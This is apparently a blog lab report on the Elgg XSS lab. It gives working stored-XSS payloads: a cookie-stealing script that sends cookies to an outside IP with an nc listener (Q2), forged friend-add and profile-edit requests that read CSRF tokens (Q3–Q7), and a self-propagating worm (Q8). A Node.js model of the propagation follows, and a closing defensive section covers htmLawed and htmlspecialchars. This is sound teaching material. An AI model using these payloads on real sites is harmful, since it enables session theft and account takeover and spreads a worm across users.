绝望的肉
[Lab Report] XSS Target Range
7475 views | 2020-11-24 | Reading time: about 0 minutes | Category: Security | Tags:
Note: this article was written 307 days ago and last modified 307 days ago; some of the information may be out of date.

Cross-Site Scripting (XSS) Attack Lab

Q1:

Insert the following malicious JS payload into Boby's profile:

<img src=1 onerror=confirm(document.cookie)>

The image fails to load, so the onerror handler runs in the browser of whoever views the profile.

Log in as admin and visit Boby's profile. The confirm() dialog pops up showing admin's cookie.

http://ec2-3-84-6-48.compute-1.amazonaws.com/profile/Boby

Opening the Network tab in the browser developer tools (F12) confirms that the cookie shown is indeed admin's.

Q2:

To receive cookies from other users, we need a separate server listening on a port.

We add the XSS payload to Alice's profile and then have admin visit Alice's profile page.

Payload:

<script>document.write('<img src="http://47.114.179.29:5555/?c='+document.cookie+'"/>');</script>

Before doing this, start a listener on the VPS:

nc -lvvp 5555

The victim's browser requests the image URL, and the user's cookie arrives in the query string on the listener.

Q3

Add the following malicious code to Samy's profile:

<script type="text/javascript">
window.onload = function () {
    var Ajax = null;
    // Elgg rejects action requests that do not carry the current timestamp and CSRF token;
    // this script runs in the page's origin, so it can read them from the victim's session.
    var ts = "&__elgg_ts=" + elgg.security.token.__elgg_ts;
    var token = "&__elgg_token=" + elgg.security.token.__elgg_token;
    // Construct the HTTP request to add Samy (guid 47) as a friend.
    var sendurl = "http://ec2-3-84-6-48.compute-1.amazonaws.com/action/friends/add?friend=47" + ts + token; //FILL IN
    // Create and send Ajax request to add friend
    Ajax = new XMLHttpRequest();
    Ajax.open("GET", sendurl, true);
    // Host is a forbidden header name: the browser ignores this call and sets Host itself.
    Ajax.setRequestHeader("Host", "ec2-3-84-6-48.compute-1.amazonaws.com");
    Ajax.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
    Ajax.send();
}
</script>

When another user visits Samy's page, the code runs in that user's browser. The request it sends can be viewed in the Network tab of the F12 developer tools.

As the screenshot shows, Samy has been added as a friend.

Q4

Observing a normal friend-add request shows that the server expects the __elgg_ts and __elgg_token parameters in the GET query string. They are Elgg's defence against cross-site request forgery, and the action is rejected without them.

var ts="&__elgg_ts="+elgg.security.token.__elgg_ts

var token="&__elgg_token="+elgg.security.token.__elgg_token

These two lines read the values belonging to whichever user is viewing the page, from the elgg.security.token object that Elgg exposes to page scripts. Because the injected script runs in the same origin as the application, it can read a token that a cross-site attacker could not.

At the same time, the lines build the parameters in the same format the legitimate GET request uses.

Q5

I think the XSS attack can't be carried out.

Entering the code in Editor Mode wraps it in HTML tags by default, and the request shows that many of the characters have been entity-encoded. Submitting directly in Text Mode, by contrast, uploads the malicious code intact.

Q6

if(elgg.session.user.guid != samyGuid)

After the profile is saved, Elgg redirects to the profile page by default, which would run the saved malicious code in Samy's own session. This check stops the code from executing as Samy, so the payload cannot overwrite the profile that is its own source of infection.

Q7

<script type="text/javascript">
window.onload = function(){
//JavaScript code to access user name, user guid, Time Stamp __elgg_ts
//and Security Token __elgg_token
var userName=elgg.session.user.name;
var guid="&guid="+elgg.session.user.guid;
var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
var token="&__elgg_token="+elgg.security.token.__elgg_token;
//Construct the content of your url.
var content=token+ts+"&name="+userName+"&description=Hacked+by+hacker1&accesslevel%5Bdescription%5D=2&briefdescription=&accesslevel%5Bbriefdescription%5D=2&location=&accesslevel%5Blocation%5D=2&interests=&accesslevel%5Binterests%5D=2&skills=&accesslevel%5Bskills%5D=2&contactemail=&accesslevel%5Bcontactemail%5D=2&phone=&accesslevel%5Bphone%5D=2&mobile=&accesslevel%5Bmobile%5D=2&website=&accesslevel%5Bwebsite%5D=2&twitter=&accesslevel%5Btwitter%5D=2"+guid; //FILL IN
var sendurl="http://ec2-3-84-6-48.compute-1.amazonaws.com/action/profile/edit"; //FILL IN
var samyGuid=47; //FILL IN

//Create and send Ajax request to modify profile
var Ajax=null;
Ajax=new XMLHttpRequest();
Ajax.open("POST",sendurl,true);
Ajax.setRequestHeader("Host","ec2-3-84-6-48.compute-1.amazonaws.com");
Ajax.setRequestHeader("Content-Type",
"application/x-www-form-urlencoded");
Ajax.send(content);

}
</script>

After saving, the browser returns to Samy's profile page, which triggers the malicious code immediately (this version has no guid check).

As a result the malicious code is overwritten: Samy's own description is replaced with the "Hacked by hacker1" content.

Q8

Combine this with the code from the previous question into one script.

<script id="worm" type="text/javascript">
window.onload = function(){
    // Read this script's own source from the DOM and wrap it in the same tag,
    // so the copy placed in the victim's profile is again a complete worm.
    var headerTag = "<script id=\'worm\' type=\'text/javascript\'>";
    var jsCode = document.getElementById("worm").innerHTML;
    // The closing tag is split so the literal </script> does not end this script element.
    var tailTag = "</" + "script>";
    var wormCode = encodeURIComponent(headerTag + jsCode + tailTag);

    var userName=elgg.session.user.name;
    var guid="&guid="+elgg.session.user.guid;
    var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
    var token="&__elgg_token="+elgg.security.token.__elgg_token;
    //Construct the content of your url.
    var content=token+ts+"&name="+userName+"&description=hacked+by"+ wormCode + "</p>&accesslevel%5Bdescription%5D=2&briefdescription=&accesslevel%5Bbriefdescription%5D=2&location=&accesslevel%5Blocation%5D=2&interests=&accesslevel%5Binterests%5D=2&skills=&accesslevel%5Bskills%5D=2&contactemail=&accesslevel%5Bcontactemail%5D=2&phone=&accesslevel%5Bphone%5D=2&mobile=&accesslevel%5Bmobile%5D=2&website=&accesslevel%5Bwebsite%5D=2&twitter=&accesslevel%5Btwitter%5D=2"+guid; //FILL IN
    var sendurl="http://ec2-3-84-6-48.compute-1.amazonaws.com/action/profile/edit"; //FILL IN
    var samyGuid=47; //FILL IN
    // Do not run as Samy, otherwise the worm overwrites its own source (see Q6).
    if(elgg.session.user.guid!=samyGuid)
    {
        //Create and send Ajax request to modify profile
        var Ajax=null;
        Ajax=new XMLHttpRequest();
        Ajax.open("POST",sendurl,true);
        Ajax.setRequestHeader("Host","ec2-3-84-6-48.compute-1.amazonaws.com");
        Ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
        Ajax.send(content);
    }
}
</script>

When admin visits Samy's profile page, the malicious code is written into admin's profile.

When Boby then visits admin's profile page, Boby's profile is infected as well: the XSS worm has started to spread.
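As an added example (not the lab's own code and not Elgg's), the Node.js script below models the requests from Q3/Q4 and Q7 and the self-copy step of the Q8 worm, so that the propagation can be checked without a browser. It shows why the forged requests work despite Elgg's CSRF tokens (the injected script runs inside the application's origin and simply reads elgg.security.token for the victim's session, which a cross-site page could not), builds the profile-edit body with URLSearchParams instead of the hand-encoded string, and feeds the output of one infection into the next to confirm the worm arrives unchanged. Assumptions: the DOM lookup document.getElementById("worm").innerHTML is replaced by a regular expression over the stored HTML, and the session objects (guid, name, ts, token) are invented; the base URL and Samy's guid 47 are from the page.

```javascript
// Added example, not the lab's or Elgg's code: a Node.js model of the forged
// requests in Q3/Q4 (friend-add with the victim's CSRF token), Q7 (profile edit)
// and the self-replication step of the Q8 worm. The browser DOM is stood in for
// by a regular expression over the infected profile's HTML. Base URL and guid 47
// are from the page; the session objects described below are invented.
const BASE = 'http://ec2-3-84-6-48.compute-1.amazonaws.com';
const SAMY_GUID = 47;

// A session mirrors what the page reads from elgg.session.user and
// elgg.security.token, e.g. { guid: 40, name: 'admin', ts: '1606200000', token: 't0k' }.

// Q3/Q4: the friend-add action only succeeds when it carries the current user's
// __elgg_ts and __elgg_token. A third-party site cannot read them (same-origin
// policy), but script injected into the page can.
function friendAddUrl(session) {
  const params = new URLSearchParams({
    friend: String(SAMY_GUID),
    __elgg_ts: session.ts,
    __elgg_token: session.token,
  });
  return BASE + '/action/friends/add?' + params.toString();
}

// Q7: the /action/profile/edit body. URLSearchParams yields the same encoding the
// page builds by hand (accesslevel[description] -> accesslevel%5Bdescription%5D).
function profileEditBody(session, description) {
  const fields = ['description', 'briefdescription', 'location', 'interests',
    'skills', 'contactemail', 'phone', 'mobile', 'website', 'twitter'];
  const params = new URLSearchParams();
  params.set('__elgg_token', session.token);
  params.set('__elgg_ts', session.ts);
  params.set('name', session.name);
  for (const f of fields) {
    params.set(f, f === 'description' ? description : '');
    params.set('accesslevel[' + f + ']', '2'); // 2 = public, as in the page's payload
  }
  params.set('guid', String(session.guid));
  return params.toString();
}

// Q8: the worm copies its own source. In the browser this is
// document.getElementById("worm").innerHTML; here it is a regex over the HTML.
const WORM_RE = /<script id=['"]worm['"][^>]*>([\s\S]*?)<\/script>/i;

function extractWormSource(profileHtml) {
  const m = WORM_RE.exec(profileHtml);
  return m ? m[1] : null;
}

// The closing tag is assembled as "</" + "script>" so the literal sequence
// </script> never appears inside the script body and cannot end it early.
function wrapWorm(jsCode) {
  const headerTag = "<script id='worm' type='text/javascript'>";
  const tailTag = '</' + 'script>';
  return headerTag + jsCode + tailTag;
}

// One hop of propagation: a visitor with `victim` session loads an infected
// profile. Returns the POST the victim's browser would send, or null when
// nothing is sent (no worm present, or the visitor is Samy: the Q6 guid check).
function infect(infectedProfileHtml, victim) {
  const src = extractWormSource(infectedProfileHtml);
  if (src === null) return null;
  if (victim.guid === SAMY_GUID) return null;
  return {
    method: 'POST',
    url: BASE + '/action/profile/edit',
    body: profileEditBody(victim, 'hacked by ' + wrapWorm(src)),
  };
}

// What the victim's profile page will contain afterwards: the description is
// stored and, with no sanitiser enabled, rendered as raw HTML.
function descriptionFromBody(body) {
  return new URLSearchParams(body).get('description');
}
```

Chaining infect() twice (Samy's profile -> admin -> Boby) and comparing the descriptions shows the worm text is identical at every hop, which is exactly the property that makes the Q8 payload self-propagating; the same chain returns null when the visitor is Samy, reproducing the Q6 guard.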

Q9

Enable the HTMLawed plugin:

Account -> Administration -> Plugins

Visiting Samy's profile page now shows the malicious code rendered as plain text (entity-encoded). At the same time, many HTML tags have been stripped, such as <script id="worm">.

Connecting to the virtual machine over SSH, the source code of htmLawed can be found in this directory:

/var/www/XSS/Elgg/mod/htmlawed

Part of the source code is shown below.

htmLawed filters the submitted HTML and removes most dangerous tags and attributes, which defends against stored XSS.

Q10

Uncomment the relevant lines to enable htmlspecialchars().

htmlspecialchars() is a built-in PHP function that converts the predefined characters &, <, >, " (and, with ENT_QUOTES, ') into HTML entities.

The payload then appears on the page looking like ordinary code, but it has been entity-encoded and is no longer executed.
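As an added example (not from the lab report and not PHP's own code), the JavaScript below ports the escaping rules of htmlspecialchars() and applies them to the Q1 and Q2 payloads, so the effect of the Q10 countermeasure can be checked outside Elgg. It also shows the caveat a practitioner should know: htmlspecialchars() only escapes single quotes when called with ENT_QUOTES, which became the default in PHP 8.1; on older PHP, a value placed inside a single-quoted attribute can still break out. Escaping is specific to HTML text and attribute context and does not make a value safe inside a <script> block or a URL, which is the difference from htmLawed in Q9, which parses the HTML and keeps only an allow-list of elements. The template markup and the attribute example are invented.

```javascript
// Added example, not from the lab report and not PHP's implementation: a
// JavaScript port of PHP's htmlspecialchars() escaping rules, applied to the
// payloads from Q1 and Q2 (copied from the page) to show what the Q10
// countermeasure changes. Template markup below is invented for illustration.

const ENT_COMPAT = 'ENT_COMPAT';   // escape double quotes only (PHP < 8.1 default)
const ENT_QUOTES = 'ENT_QUOTES';   // escape both quote kinds (PHP >= 8.1 default)

// Same five replacements PHP performs; '&' goes first so the entities produced
// by the later replacements are not escaped again.
function htmlspecialchars(s, flags = ENT_QUOTES) {
  let out = String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;');
  if (flags === ENT_QUOTES) out = out.replace(/'/g, '&#039;');
  return out;
}

const PAYLOAD_Q1 = '<img src=1 onerror=confirm(document.cookie)>';
const PAYLOAD_Q2 = '<script>document.write(\'<img src="http://47.114.179.29:5555/?c=\'+document.cookie+\'"/>\');</script>';

// Profile description rendered in HTML text context. escape === null reproduces
// the vulnerable lab setting, where the stored value is echoed unchanged.
function renderDescription(value, escape) {
  const body = escape ? escape(value) : value;
  return '<div class="elgg-output">' + body + '</div>';
}

// The same value dropped into a single-quoted attribute: the case ENT_COMPAT
// does not cover, because the unescaped ' closes the attribute.
function renderTitleAttr(value, flags) {
  return "<a href=\"#\" title='" + htmlspecialchars(value, flags) + "'>profile</a>";
}

// Number of tag starts ("<" followed by a letter, "/" or "!") in the markup.
// Once escaped, the payload's own tags are gone and only the template's remain.
function tagCount(html) {
  return (html.match(/<[a-zA-Z\/!]/g) || []).length;
}
```

With escaping applied, the Q2 payload contributes no tag starts at all (only the template's own div remains), which is why the page shows it as text; with ENT_COMPAT the attribute example still renders a live onmouseover handler, which is why the flag matters.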

Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License
